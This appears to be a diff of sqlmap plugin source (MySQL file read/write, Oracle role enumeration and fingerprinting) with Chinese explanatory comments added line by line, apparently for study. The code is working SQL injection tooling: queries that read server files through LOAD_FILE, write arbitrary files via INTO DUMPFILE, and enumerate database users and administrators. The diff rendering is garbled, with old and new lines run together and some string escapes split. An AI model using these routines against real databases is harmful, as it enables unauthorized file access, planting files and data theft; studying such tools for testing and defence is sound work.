Backend.setOsServicePack(sp) Backend.setOsServicePack(sp) # 设置操作系统服务包
break break
if not Backend.getOsServicePack(): if not Backend.getOsServicePack(): # 如果没有获取到服务包
debugMsg = "assuming the operating system has no service pack" debugMsg = "assuming the operating system has no service pack" # 输出调试信息
logger.debug(debugMsg) logger.debug(debugMsg)
Backend.setOsServicePack(0) Backend.setOsServicePack(0) # 默认设置为服务包 0
if Backend.getOsVersion(): if Backend.getOsVersion():
infoMsg += " Service Pack %d" % Backend.getOsServicePack() infoMsg += " Service Pack %d" % Backend.getOsServicePack() # 将服务包信息添加到日志信息
logger.info(infoMsg) logger.info(infoMsg)
self.cleanup(onlyFileTbl=True) self.cleanup(onlyFileTbl=True) # 清理支持表

@ -5,96 +5,118 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from lib.core.agent import agent # 1. 从库中导入需要的模块
from lib.core.common import getSQLSnippet from lib.core.agent import agent # SQL 注入执行代理
from lib.core.common import isNumPosStrValue from lib.core.common import getSQLSnippet # 获取 SQL 代码片段
from lib.core.common import isTechniqueAvailable from lib.core.common import isNumPosStrValue # 检查值是否为正数
from lib.core.common import popValue from lib.core.common import isTechniqueAvailable # 判断某注入方法是否可用
from lib.core.common import pushValue from lib.core.common import popValue # 弹出栈值
from lib.core.common import randomStr from lib.core.common import pushValue # 压入栈值
from lib.core.common import singleTimeWarnMessage from lib.core.common import randomStr # 生成随机字符串
from lib.core.compat import xrange from lib.core.common import singleTimeWarnMessage # 输出只显示一次的警告
from lib.core.data import conf from lib.core.compat import xrange # 兼容的 range 函数
from lib.core.data import kb from lib.core.data import conf # 全局配置信息
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.decorators import stackedmethod from lib.core.data import logger # 日志记录器
from lib.core.enums import CHARSET_TYPE from lib.core.decorators import stackedmethod # 堆叠方法装饰器
from lib.core.enums import DBMS from lib.core.enums import CHARSET_TYPE # 字符集类型
from lib.core.enums import EXPECTED from lib.core.enums import DBMS # 数据库类型枚举
from lib.core.enums import PAYLOAD from lib.core.enums import EXPECTED # 期望类型
from lib.core.enums import PLACE from lib.core.enums import PAYLOAD # payload 类型
from lib.core.exception import SqlmapNoneDataException from lib.core.enums import PLACE # 注入位置
from lib.request import inject from lib.core.exception import SqlmapNoneDataException # 无数据异常
from lib.request.connect import Connect as Request from lib.request import inject # 注入相关函数
from lib.techniques.union.use import unionUse from lib.request.connect import Connect as Request # 连接请求
from plugins.generic.filesystem import Filesystem as GenericFilesystem from lib.techniques.union.use import unionUse # UNION 注入方法
from plugins.generic.filesystem import Filesystem as GenericFilesystem # 通用文件系统操作类
# 2. 定义一个类 Filesystem继承自 GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
# 3. 非堆叠读取文件的方法
def nonStackedReadFile(self, rFile): def nonStackedReadFile(self, rFile):
# 4. 如果不是暴力模式,则输出读取文件信息
if not kb.bruteMode: if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % rFile infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg) logger.info(infoMsg)
# 5. 执行SQL注入读取文件内容并以十六进制返回
result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL) result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL)
# 6. 返回读取结果
return result return result
# 7. 堆叠读取文件的方法
def stackedReadFile(self, remoteFile): def stackedReadFile(self, remoteFile):
# 8. 如果不是暴力模式,则输出读取文件信息
if not kb.bruteMode: if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
# 9. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "longtext") self.createSupportTbl(self.fileTblName, self.tblField, "longtext")
# 10. 获取远程临时目录
self.getRemoteTempPath() self.getRemoteTempPath()
# 11. 构建临时文件名
tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True)) tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))
# 12. 输出调试信息
debugMsg = "saving hexadecimal encoded content of file '%s' " % remoteFile debugMsg = "saving hexadecimal encoded content of file '%s' " % remoteFile
debugMsg += "into temporary file '%s'" % tmpFile debugMsg += "into temporary file '%s'" % tmpFile
logger.debug(debugMsg) logger.debug(debugMsg)
# 13. 通过堆叠查询,将文件内容以十六进制形式保存到临时文件
inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (remoteFile, tmpFile)) inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (remoteFile, tmpFile))
# 14. 输出调试信息
debugMsg = "loading the content of hexadecimal encoded file " debugMsg = "loading the content of hexadecimal encoded file "
debugMsg += "'%s' into support table" % remoteFile debugMsg += "'%s' into support table" % remoteFile
logger.debug(debugMsg) logger.debug(debugMsg)
# 15. 通过堆叠查询,将临时文件内容导入到支持表中
inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField)) inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))
# 16. 从支持表中获取文件内容的长度
length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
# 17. 如果获取到的文件长度不合法
if not isNumPosStrValue(length): if not isNumPosStrValue(length):
warnMsg = "unable to retrieve the content of the " warnMsg = "unable to retrieve the content of the "
warnMsg += "file '%s'" % remoteFile warnMsg += "file '%s'" % remoteFile
# 18. 如果是直接模式或可以使用UNION注入
if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
if not kb.bruteMode: if not kb.bruteMode:
warnMsg += ", going to fall-back to simpler UNION technique" warnMsg += ", going to fall-back to simpler UNION technique"
logger.warning(warnMsg) logger.warning(warnMsg)
# 19. 使用非堆叠方法读取文件
result = self.nonStackedReadFile(remoteFile) result = self.nonStackedReadFile(remoteFile)
else: else:
# 20. 如果没有可用的方法,则抛出异常
raise SqlmapNoneDataException(warnMsg) raise SqlmapNoneDataException(warnMsg)
else: else:
# 21. 将获取到的文件长度转为整数
length = int(length) length = int(length)
chunkSize = 1024 chunkSize = 1024
# 22. 如果文件长度大于 chunkSize
if length > chunkSize: if length > chunkSize:
result = [] result = []
# 23. 循环读取文件内容
for i in xrange(1, length, chunkSize): for i in xrange(1, length, chunkSize):
chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk) result.append(chunk)
else: else:
# 24. 直接读取文件内容
result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
# 25. 返回文件内容
return result return result
# 26. 使用 UNION 注入写入文件的方法
@stackedmethod @stackedmethod
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
logger.debug("encoding file to its hexadecimal string value") logger.debug("encoding file to its hexadecimal string value")
# 27. 对本地文件进行十六进制编码
fcEncodedList = self.fileEncode(localFile, "hex", True) fcEncodedList = self.fileEncode(localFile, "hex", True)
fcEncodedStr = fcEncodedList[0] fcEncodedStr = fcEncodedList[0]
fcEncodedStrLen = len(fcEncodedStr) fcEncodedStrLen = len(fcEncodedStr)
# 28. 如果在 GET 请求中且编码后的长度大于 8000则输出警告信息
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
warnMsg = "as the injection is on a GET parameter and the file " warnMsg = "as the injection is on a GET parameter and the file "
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
@ -102,28 +124,36 @@ class Filesystem(GenericFilesystem):
warnMsg += "writing process" warnMsg += "writing process"
logger.warning(warnMsg) logger.warning(warnMsg)
# 29. 输出调试信息
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
# 30. 强制使用负数 where 条件
pushValue(kb.forceWhere) pushValue(kb.forceWhere)
kb.forceWhere = PAYLOAD.WHERE.NEGATIVE kb.forceWhere = PAYLOAD.WHERE.NEGATIVE
# 31. 构建 SQL 查询语句
sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile) sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile)
# 32. 执行 SQL 查询
unionUse(sqlQuery, unpack=False) unionUse(sqlQuery, unpack=False)
kb.forceWhere = popValue() kb.forceWhere = popValue()
# 33. 输出警告信息,提示文件可能包含垃圾字符
warnMsg = "expect junk characters inside the " warnMsg = "expect junk characters inside the "
warnMsg += "file as a leftover from UNION query" warnMsg += "file as a leftover from UNION query"
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
# 34. 检查写入的文件
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 35. 使用 LINES TERMINATED 写入文件的方法
def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
logger.debug("encoding file to its hexadecimal string value") logger.debug("encoding file to its hexadecimal string value")
# 36. 对本地文件进行十六进制编码
fcEncodedList = self.fileEncode(localFile, "hex", True) fcEncodedList = self.fileEncode(localFile, "hex", True)
fcEncodedStr = fcEncodedList[0][2:] fcEncodedStr = fcEncodedList[0][2:]
fcEncodedStrLen = len(fcEncodedStr) fcEncodedStrLen = len(fcEncodedStr)
# 37. 如果在 GET 请求中且编码后的长度大于 8000则输出警告信息
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
warnMsg = "the injection is on a GET parameter and the file " warnMsg = "the injection is on a GET parameter and the file "
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
@ -131,47 +161,59 @@ class Filesystem(GenericFilesystem):
warnMsg += "writing process" warnMsg += "writing process"
logger.warning(warnMsg) logger.warning(warnMsg)
# 38. 输出调试信息
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
# 39. 获取 SQL 代码片段
query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr) query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr)
# 40. 添加 SQL 前缀
query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
# 41. 生成 payload
payload = agent.payload(newValue=query) payload = agent.payload(newValue=query)
# 42. 执行 SQL 查询
Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False) Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)
# 43. 输出警告信息,提示文件可能包含垃圾字符
warnMsg = "expect junk characters inside the " warnMsg = "expect junk characters inside the "
warnMsg += "file as a leftover from original query" warnMsg += "file as a leftover from original query"
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
# 44. 检查写入的文件
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 45. 使用堆叠查询写入文件的方法
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# 46. 输出调试信息
debugMsg = "creating a support table to write the hexadecimal " debugMsg = "creating a support table to write the hexadecimal "
debugMsg += "encoded file to" debugMsg += "encoded file to"
logger.debug(debugMsg) logger.debug(debugMsg)
# 47. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "longblob") self.createSupportTbl(self.fileTblName, self.tblField, "longblob")
# 48. 输出调试信息
logger.debug("encoding file to its hexadecimal string value") logger.debug("encoding file to its hexadecimal string value")
# 49. 对本地文件进行十六进制编码
fcEncodedList = self.fileEncode(localFile, "hex", False) fcEncodedList = self.fileEncode(localFile, "hex", False)
# 50. 输出调试信息
debugMsg = "forging SQL statements to write the hexadecimal " debugMsg = "forging SQL statements to write the hexadecimal "
debugMsg += "encoded file to the support table" debugMsg += "encoded file to the support table"
logger.debug(debugMsg) logger.debug(debugMsg)
# 51. 将文件内容转换为 SQL 查询语句
sqlQueries = self.fileToSqlQueries(fcEncodedList) sqlQueries = self.fileToSqlQueries(fcEncodedList)
# 52. 输出调试信息
logger.debug("inserting the hexadecimal encoded file to the support table") logger.debug("inserting the hexadecimal encoded file to the support table")
# 53. 设置最大允许的数据包大小
inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230) inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230)
# 54. 循环执行 SQL 查询语句
for sqlQuery in sqlQueries: for sqlQuery in sqlQueries:
inject.goStacked(sqlQuery) inject.goStacked(sqlQuery)
# 55. 输出调试信息
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
# 56. 使用 DUMPFILE 将数据导出到远程文件
# Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html
inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True) inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True)
# 57. 检查写入的文件
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)

@ -5,85 +5,91 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from lib.core.common import getLimitRange # 1. 导入必要的模块
from lib.core.common import isAdminFromPrivileges from lib.core.common import getLimitRange # 获取限制范围
from lib.core.common import isInferenceAvailable from lib.core.common import isAdminFromPrivileges # 判断是否为管理员
from lib.core.common import isNoneValue from lib.core.common import isInferenceAvailable # 判断是否可以使用推断注入
from lib.core.common import isNumPosStrValue from lib.core.common import isNoneValue # 判断是否为 None 值
from lib.core.common import isTechniqueAvailable from lib.core.common import isNumPosStrValue # 判断是否为数字正字符串值
from lib.core.compat import xrange from lib.core.common import isTechniqueAvailable # 判断是否可以使用特定注入技术
from lib.core.data import conf from lib.core.compat import xrange # 兼容 Python 2 和 3 的 xrange
from lib.core.data import kb from lib.core.data import conf # 全局配置信息
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.data import queries from lib.core.data import logger # 日志记录器
from lib.core.enums import CHARSET_TYPE from lib.core.data import queries # SQL 查询语句
from lib.core.enums import DBMS from lib.core.enums import CHARSET_TYPE # 字符集类型枚举
from lib.core.enums import EXPECTED from lib.core.enums import DBMS # 数据库管理系统枚举
from lib.core.enums import PAYLOAD from lib.core.enums import EXPECTED # 预期返回类型枚举
from lib.core.exception import SqlmapNoneDataException from lib.core.enums import PAYLOAD # 注入类型枚举
from lib.core.settings import CURRENT_USER from lib.core.exception import SqlmapNoneDataException # 没有数据异常
from lib.request import inject from lib.core.settings import CURRENT_USER # 当前用户
from plugins.generic.enumeration import Enumeration as GenericEnumeration from lib.request import inject # 注入相关函数
from plugins.generic.enumeration import Enumeration as GenericEnumeration # 通用枚举类
# 2. 定义一个类 Enumeration继承自 GenericEnumeration
class Enumeration(GenericEnumeration): class Enumeration(GenericEnumeration):
# 3. 获取数据库用户角色
def getRoles(self, query2=False): def getRoles(self, query2=False):
# 4. 输出获取数据库用户角色信息
infoMsg = "fetching database users roles" infoMsg = "fetching database users roles"
# 5. 从查询集中获取角色查询语句
rootQuery = queries[DBMS.ORACLE].roles rootQuery = queries[DBMS.ORACLE].roles
# 6. 如果用户名为当前用户,则获取当前用户名
if conf.user == CURRENT_USER: if conf.user == CURRENT_USER:
infoMsg += " for current user" infoMsg += " for current user"
conf.user = self.getCurrentUser() conf.user = self.getCurrentUser()
logger.info(infoMsg) logger.info(infoMsg)
# Set containing the list of DBMS administrators # 7. 存储管理员用户的集合
areAdmins = set() areAdmins = set()
# 8. 检查是否存在可用的注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
# 9. 选择使用哪个查询语句
if query2: if query2:
query = rootQuery.inband.query2 query = rootQuery.inband.query2
condition = rootQuery.inband.condition2 condition = rootQuery.inband.condition2
else: else:
query = rootQuery.inband.query query = rootQuery.inband.query
condition = rootQuery.inband.condition condition = rootQuery.inband.condition
# 10. 如果指定了用户名,则添加到查询条件中
if conf.user: if conf.user:
users = conf.user.split(',') users = conf.user.split(',')
query += " WHERE " query += " WHERE "
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
# 11. 执行查询语句,获取用户角色信息
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False)
# 12. 如果没有获取到数据,尝试使用备用表 `USER_ROLE_PRIVS`
if not values and not query2: if not values and not query2:
infoMsg = "trying with table 'USER_ROLE_PRIVS'" infoMsg = "trying with table 'USER_ROLE_PRIVS'"
logger.info(infoMsg) logger.info(infoMsg)
return self.getRoles(query2=True) return self.getRoles(query2=True)
# 13. 处理获取到的用户角色信息
if not isNoneValue(values): if not isNoneValue(values):
for value in values: for value in values:
user = None user = None
roles = set() roles = set()
for count in xrange(0, len(value or [])): for count in xrange(0, len(value or [])):
# The first column is always the username # 14. 第一列为用户名
if count == 0: if count == 0:
user = value[count] user = value[count]
# 15. 其他列为角色
# The other columns are the roles
else: else:
role = value[count] role = value[count]
# In Oracle we get the list of roles as string
roles.add(role) roles.add(role)
# 16. 将用户角色信息添加到缓存中
if user in kb.data.cachedUsersRoles: if user in kb.data.cachedUsersRoles:
kb.data.cachedUsersRoles[user] = list(roles.union(kb.data.cachedUsersRoles[user])) kb.data.cachedUsersRoles[user] = list(roles.union(kb.data.cachedUsersRoles[user]))
else: else:
kb.data.cachedUsersRoles[user] = list(roles) kb.data.cachedUsersRoles[user] = list(roles)
# 17. 如果没有获取到用户角色信息,尝试使用推断注入
if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct: if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct:
# 18. 获取用户名列表
if conf.user: if conf.user:
users = conf.user.split(',') users = conf.user.split(',')
else: else:
@ -93,13 +99,11 @@ class Enumeration(GenericEnumeration):
users = kb.data.cachedUsers users = kb.data.cachedUsers
retrievedUsers = set() retrievedUsers = set()
# 19. 遍历用户列表,获取每个用户的角色信息
for user in users: for user in users:
unescapedUser = None unescapedUser = None
if user in retrievedUsers: if user in retrievedUsers:
continue continue
infoMsg = "fetching number of roles " infoMsg = "fetching number of roles "
infoMsg += "for user '%s'" % user infoMsg += "for user '%s'" % user
logger.info(infoMsg) logger.info(infoMsg)
@ -113,13 +117,13 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count2 % queryUser query = rootQuery.blind.count2 % queryUser
else: else:
query = rootQuery.blind.count % queryUser query = rootQuery.blind.count % queryUser
# 20. 获取每个用户的角色数量
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
# 21. 如果没有获取到角色数量,尝试使用备用表 `USER_SYS_PRIVS`
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if count != 0 and not query2: if count != 0 and not query2:
infoMsg = "trying with table 'USER_SYS_PRIVS'" infoMsg = "trying with table 'USER_SYS_PRIVS'"
logger.info(infoMsg) logger.info(infoMsg)
return self.getPrivileges(query2=True) return self.getPrivileges(query2=True)
warnMsg = "unable to retrieve the number of " warnMsg = "unable to retrieve the number of "
@ -133,33 +137,33 @@ class Enumeration(GenericEnumeration):
roles = set() roles = set()
indexRange = getLimitRange(count, plusOne=True) indexRange = getLimitRange(count, plusOne=True)
# 22. 遍历角色索引,获取每个角色信息
for index in indexRange: for index in indexRange:
if query2: if query2:
query = rootQuery.blind.query2 % (queryUser, index) query = rootQuery.blind.query2 % (queryUser, index)
else: else:
query = rootQuery.blind.query % (queryUser, index) query = rootQuery.blind.query % (queryUser, index)
role = inject.getValue(query, union=False, error=False)
# In Oracle we get the list of roles as string role = inject.getValue(query, union=False, error=False)
roles.add(role) roles.add(role)
# 23. 将获取到的角色信息添加到缓存中
if roles: if roles:
kb.data.cachedUsersRoles[user] = list(roles) kb.data.cachedUsersRoles[user] = list(roles)
else: else:
warnMsg = "unable to retrieve the roles " warnMsg = "unable to retrieve the roles "
warnMsg += "for user '%s'" % user warnMsg += "for user '%s'" % user
logger.warning(warnMsg) logger.warning(warnMsg)
retrievedUsers.add(user) retrievedUsers.add(user)
# 24. 如果没有获取到用户角色信息,抛出异常
if not kb.data.cachedUsersRoles: if not kb.data.cachedUsersRoles:
errMsg = "unable to retrieve the roles " errMsg = "unable to retrieve the roles "
errMsg += "for the database users" errMsg += "for the database users"
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
# 25. 从角色信息中判断管理员用户
for user, privileges in kb.data.cachedUsersRoles.items(): for user, privileges in kb.data.cachedUsersRoles.items():
if isAdminFromPrivileges(privileges): if isAdminFromPrivileges(privileges):
areAdmins.add(user) areAdmins.add(user)
# 26. 返回用户角色信息和管理员用户
return kb.data.cachedUsersRoles, areAdmins return kb.data.cachedUsersRoles, areAdmins

@ -5,106 +5,120 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import re # 1. 导入必要的模块
import re # 正则表达式模块
from lib.core.common import Backend
from lib.core.common import Format from lib.core.common import Backend # 后端数据库信息
from lib.core.data import conf from lib.core.common import Format # 格式化输出
from lib.core.data import kb from lib.core.data import conf # 全局配置信息
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.enums import DBMS from lib.core.data import logger # 日志记录器
from lib.core.session import setDbms from lib.core.enums import DBMS # 数据库管理系统枚举
from lib.core.settings import ORACLE_ALIASES from lib.core.session import setDbms # 设置数据库管理系统
from lib.request import inject from lib.core.settings import ORACLE_ALIASES # Oracle 数据库别名
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint from lib.request import inject # 注入相关函数
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 通用指纹识别类
# 2. 定义一个类 Fingerprint继承自 GenericFingerprint
class Fingerprint(GenericFingerprint): class Fingerprint(GenericFingerprint):
# 3. 构造函数,初始化数据库类型为 Oracle
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.ORACLE) GenericFingerprint.__init__(self, DBMS.ORACLE)
# 4. 获取指纹信息
def getFingerprint(self): def getFingerprint(self):
value = "" value = ""
# 5. 获取 Web 服务器的操作系统指纹
wsOsFp = Format.getOs("web server", kb.headersFp) wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp: if wsOsFp:
value += "%s\n" % wsOsFp value += "%s\
" % wsOsFp
# 6. 获取后端数据库的操作系统指纹
if kb.data.banner: if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp: if dbmsOsFp:
value += "%s\n" % dbmsOsFp value += "%s\
" % dbmsOsFp
value += "back-end DBMS: " value += "back-end DBMS: "
# 7. 如果没有启用详细指纹识别,则只输出数据库类型
if not conf.extensiveFp: if not conf.extensiveFp:
value += DBMS.ORACLE value += DBMS.ORACLE
return value return value
# 8. 获取激活的数据库指纹
actVer = Format.getDbms() actVer = Format.getDbms()
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
# 9. 如果有 Banner 信息,则获取 Banner 解析指纹
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion") banVer = kb.bannerFp.get("dbmsVersion")
if banVer: if banVer:
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer)
# 10. 如果有 HTML 错误信息,则获取 HTML 错误指纹
htmlErrorFp = Format.getErrorParsedDBMSes() htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value return value
# 11. 检查数据库类型是否为 Oracle
def checkDbms(self): def checkDbms(self):
# 12. 如果没有启用详细指纹识别,并且后端数据库是 Oracle 的别名,则设置数据库类型并返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES): if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES):
setDbms(DBMS.ORACLE) setDbms(DBMS.ORACLE)
self.getBanner() self.getBanner()
return True return True
# 13. 输出测试数据库类型信息
infoMsg = "testing %s" % DBMS.ORACLE infoMsg = "testing %s" % DBMS.ORACLE
logger.info(infoMsg) logger.info(infoMsg)
# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does # 14. 如果是直接连接,则跳过以下测试
# not work connecting directly to the Oracle database
if conf.direct: if conf.direct:
result = True result = True
# 15. 否则,测试数据库是否满足条件 LENGTH(SYSDATE)=LENGTH(SYSDATE)
else: else:
result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
# 16. 如果测试结果为 True则进一步确认数据库类型
if result: if result:
infoMsg = "confirming %s" % DBMS.ORACLE infoMsg = "confirming %s" % DBMS.ORACLE
logger.info(infoMsg) logger.info(infoMsg)
# NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does # 17. 如果是直接连接,则跳过以下测试
# not work connecting directly to the Oracle database
if conf.direct: if conf.direct:
result = True result = True
# 18. 否则,测试数据库是否满足条件 NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])
else: else:
result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])") result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])")
# 19. 如果测试结果为 False则输出警告信息并返回 False
if not result: if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 20. 设置数据库类型为 Oracle
setDbms(DBMS.ORACLE) setDbms(DBMS.ORACLE)
self.getBanner() self.getBanner()
# 21. 如果没有启用详细指纹识别,则直接返回 True
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
# 22. 输出开始详细指纹识别信息
infoMsg = "actively fingerprinting %s" % DBMS.ORACLE infoMsg = "actively fingerprinting %s" % DBMS.ORACLE
logger.info(infoMsg) logger.info(infoMsg)
# Reference: https://en.wikipedia.org/wiki/Oracle_Database # 23. 尝试匹配数据库版本
for version in ("23c", "21c", "19c", "18c", "12c", "11g", "10g", "9i", "8i", "7"): for version in ("23c", "21c", "19c", "18c", "12c", "11g", "10g", "9i", "8i", "7"):
number = int(re.search(r"([\d]+)", version).group(1)) number = int(re.search(r"([\d]+)", version).group(1))
